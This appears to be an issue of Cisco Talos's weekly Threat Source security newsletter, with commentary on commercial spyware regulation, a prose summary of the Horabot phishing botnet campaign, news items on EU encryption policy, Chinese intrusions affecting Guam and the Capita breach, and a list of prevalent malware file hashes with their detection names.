Welcome to this week’s edition of the Threat Source newsletter.

The use of spyware continues to make headlines across the globe. While primarily used by authoritarian regimes to track potentially sensitive subjects like political opponents or activists, governments from all over the world are guilty of entering into deals with companies that make spyware.

Many of these same governments (looking at you, U.S.) are still using this software despite active attempts to stop companies from creating and selling spyware. It’s not just governments, either. Everyone from jealous exes or overbearing spouses has used spyware to track, quite literally, every move the target makes.

Talos recently was able to dissect one such spyware, Predator, revealing new details about how the spyware works, exactly, and the various functions it must track the target and steal information off their device that could even allow the end user to track the target’s exact location.

U.S. President Joe Biden signed an executive order a few weeks ago that bans the U.S. government from entering into contracts to use commercial spyware. It also threatened to step in when it looked like a U.S. company was going to purchase NSO Group, an infamous Israeli maker of the Pegasus spyware.

The European Union is also under pressure to adapt new anti-spyware laws after a study from a European parliament special committee found that Hungary and Poland used surveillance software to illegally monitor journalists, politicians and activists.

New legislation and policy can certainly help in stopping the development of these dangerous tools, but actions are louder than words.

Between 2011 and 2023, at least 74 governments worked with commercial firms to obtain spyware or digital forensics technology, according to a report from Carnegie’s global inventory of commercial spyware and digital forensics. So, if the U.S. passes anti-spyware laws, that still leaves another 70-some countries where this needs to be addressed.

Biden’s executive order isn’t bulletproof, either. The U.S. still does not have a comprehensive privacy law that could provide legal protections to targets of spyware or regulates what types of software private companies can build.

Individual states and local governments can also still pass their own rules that could prevent area companies from producing this type of software.

And internationally, it will take a coalition of governments to place international economic pressure on companies that make spyware. This could include sanctions against individual companies, or against the countries that allow those companies to operate within their borders.

As bad guys have shown throughout the history of the internet, they’re going to find ways to get around rules and regulations. The work our researchers did to uncover more about Predator is incredibly important because these tools pose a serious threat to human rights and national security of all nations.

I’d encourage everyone to ask lawmakers at all levels about what they're doing to address the international proliferation of spyware. All countries should be working to reduce demand and supply of spyware, because the industry clearly isn’t going to slow down on its own.

The one big thing

Talos has observed a threat actor deploying a previously unidentified botnet program Talos is calling “Horabot,” which delivers a known banking trojan and spam tool onto victim machines in a campaign that has been ongoing since at least November 2020. This campaign involves a multi-stage attack chain that begins with a phishing email and leads to payload delivery through the execution of a PowerShell downloader script and sideloading to legitimate executables.

Why do I care?

This newly discovered Outlook botnet allows threat actors to gain complete control of the target’s Outlook mailbox. And it’s targeting users with Yahoo, Gmail and Outlook email accounts, which are three of the most popular email providers across the globe. Anyone hit with Horabot is at risk of having their contact list stolen so the threat actor can send the malware to others and then uses your email to send phishing emails with malicious HTML attachments.

So now what?

Phishing education continues to be of the utmost importance. If one person inside an organization is infected with Horabot, it puts the entire company at risk of being targeted. Users should be educated on how to spot obvious phishing attempts or potentially malicious attachments. Talos’ blog post on Horabot also outlines several Cisco Secure solutions that can detect and block this new botnet.

Top security headlines of the week

Newly leaked documents show that Spain is advocating the European Union to ban end-to-end encryption and that it has support for the policy among other member nations. The EU commission has been considering laws for years that would ban encryption so that governments could scan private messages to identify potentially illegal content. In the leaked document, Spain argues that it is “imperative that we have access to that data,” though privacy and security experts are concerned of the implications of this. Several companies that offer encrypted messaging services have threatened to cease operations in the EU rather than break their encryption methods. At least one member country, Germany, says it would not enforce the law if passed. (Wired, techdirt)

Security researchers at Microsoft revealed that Chinese state-sponsored actors may have access to U.S. critical infrastructure networks, though American officials say they are still actively working to remove the threat and confirm that the adversaries have been eliminated. Microsoft said that the actors targeted the U.S. territory of Guam, likely to disrupt critical communication in the event of a military conflict between the U.S. and China in the Pacific Ocean, which would likely be in the event China were to invade Taiwan. National Security Agency Director of Cybersecurity Rob Joyce said the activity likely dates to last year and that the Biden administration is concerned about the “scope and scale” of the campaign. (New York Times, CNN)

Various industries are still feeling the effects of a data breach against outsourcing firm Capita. As many as 90 companies have reported breaches and the use of stolen personal information that Capita held, according to the U.K.’s Information Commissioner’s Office. Capita, which provides critical services to national and local governments in Britain, first disclosed the breach in late March. A large number of U.K. public and private organizations use Capita, which handles the personal information of millions of people. Capita often handles the payout of pension plans to other companies’ employees, and its clients also include local government councils. The Capita incident highlights the negative downstream effects that can come from any data breach. (The Guardian, BBC)

Can’t get enough Talos?

Upcoming events where you can find Talos

Cisco Live U.S. (June 4 - 8)

Las Vegas, NV

REcon (June 9 - 11)

Montreal, Canada

Most prevalent malware files from Talos telemetry over the past week

SHA 256: a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848
MD5: 8cb26e5b687cafb66e65e4fc71ec4d63
Typical Filename: a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848-dropped.bin
Claimed Product: Datto Service Monitor
Detection Name: W32.Auto:a8a6d6.in03.Talos

SHA 256: f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f
MD5: a2d60b5c01a305af1ac76c95e12fdf4a
Typical Filename: KMSAuto.exe
Claimed Product: N/A
Detection Name: W32.File.MalParent

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto_Net.exe
Claimed Product: KMSAuto Net
Detection Name:  W32.File.MalParent